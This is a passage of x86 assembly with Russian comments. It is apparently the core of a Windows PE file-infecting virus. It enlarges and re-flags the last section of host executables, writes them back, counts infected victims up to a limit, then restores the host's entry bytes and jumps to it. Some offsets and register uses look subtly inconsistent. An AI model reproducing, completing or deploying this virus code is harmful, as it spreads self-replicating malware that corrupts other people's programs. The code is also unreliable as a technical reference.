Секции PE-файла

; Выравниваем физический размер секции
_AlgnPhSz:
    mov  ebx, [esi + 3Ch]                         ; esi = VA of PE header
    add  [esi + 10h], dword ptr Virsize      ; Увеличим физический размер секции
    mov  eax, [esi + 3Ch]                         ; Берем выравнивающий фактор
    
                                                  ; FileAlign
    dec  eax
    add  [esi + 10h], eax
    not  eax
    and  [esi + 10h], eax
 
    ; Выравниваем виртуальный размер
_AlgnVrSz:
    mov   edx, [edi + 0Ch]                       ; Берем виртуальный размер
    jecxz _PtchImSz                              ; Прыгаем, если размер = 0
    add   [edi + 08Ch], dword ptr Virsize         ; Увеличим виртуальный размер секции
    mov   eax, [edi + 38h]                       ; Берем выравнивающий фактор
                                                 ; ObjectAlign
    shl   eax, 1                         
     
    dec   eax
    add   [edi + 08h], eax
    not   eax
    and   [edi + 08h], eax
 
     ; Патчим ImageSize = VirtualRVA(Last section) + VirtualSize(Last section)
_PtchImSz:
    mov   eax, [edi + 0Ch]             ; VirtualRVA(Last section)
    add   eax, [edi + 08h]             ; VirtualSize(Last section)
    mov   [edi + 50h], eax
 
    ; Изменяем флаги, характеризующие секцию
_ObjFlags:
    mov  eax, [esi + 24h]
    .IF !(eax & 00000020h)             ; Секция содержит программный код
        or eax, 00000020h
    .ENDIF
    .IF !(eax & 20000000h)             ; Секция является исполняемой
        or eax, 20000000h
    .ENDIF
    .IF !(eax & 80000000h)             ; Секция может использоваться для 
        or eax, 80000000h
    .ENDIF
    mov  [esi + 24h], eax
 
    _WriteFile:      
    xor esi, esi
    push esi
    push esi
    push esi
    push hFile
    call SetFilePointer
 
    xor  esi, esi
    push delta_off
    push esi
    push esp
    push dwAlignedFileSize
    push pAllocMem
    push hFile
    call WriteFile
    test eax, eax             ; Не удалось записать код в программу
    jz   _CloseFile
 
    ; Инкрементируем счетчик зараженных программ
    lea  esi, infect_count
    add  esi, delta_off
    inc  dword ptr [esi]
 
_CloseFile:
    push hFile
    call CloseHandle
    push pAllocMem
    call GlobalFree
 
    ; Освобождаем стек
    pop  eax
    pop  eax
    pop  eax
    pop  eax
 
    ; Проверим, сколько файлов уже заразили
    lea  esi, infect_count
    add  esi, delta_off
    cmp  dword ptr [esi], MaxVictimNumber    
    jl   _FindNextFileA
    
_Exit:
    push hFind
    call FindClose                 ; Закрываем поиск файлов
    cmp  dword ptr delta_off, 0    ; проверяем поколение
    jz   ExitVirus                 ; поколение первое - завершаемся
 
    ; ищем начало заражаемого файла по сигнатуре на текущей странице памяти 
    mov eax, OFFSET begin_data
    add eax, delta_off
    xor ax, ax
_SearchMZPE_:
    mov   edi, [eax + 3Ch]
    .IF dword ptr [eax] != 5A4Dh || dword ptr [eax + edi] != 5045h
        sub eax, 10000h
        jmp _SearchMZPE_
    .ENDIF
 
    ; Вычисляем EntryPoint VA
    mov edi, eax                      ; edi = VA of MZ header
    add edi, dword ptr [edi + 3Ch]    ; edi = VA of PE header
    mov eax, dword ptr [edi + 28h]    ; eax = RVA of EntryPoint
    add eax, dword ptr [edi + 34h]    ; eax = VA of EntryPoint
    
    pusha
    push esp   ; адрес переменной, в нее возвращается "старый" режим доступа
    push 40h   ; режим доступа (нам нужен 40h)
    push 5h    ; размер области памяти в байтах
    push eax   ; адрес области памяти, чьи атрибуты страниц нужно изменить
    call VirtualProtect
    popa
 
    ; Восстанавливаем 5 байт начала программы-носителя
    mov  ecx, 5h
    lea  esi, save_vir_b
    add  esi, delta_off       ; esi = VA of save_vir_b
    mov  edi, eax             ; edi = VA of EntryPoint
    rep  movsb
 
    ; Прыгаем на код носителя
    jmp  eax
    
ExitVirus:
    push 0
    call _ExitProcess
    
end start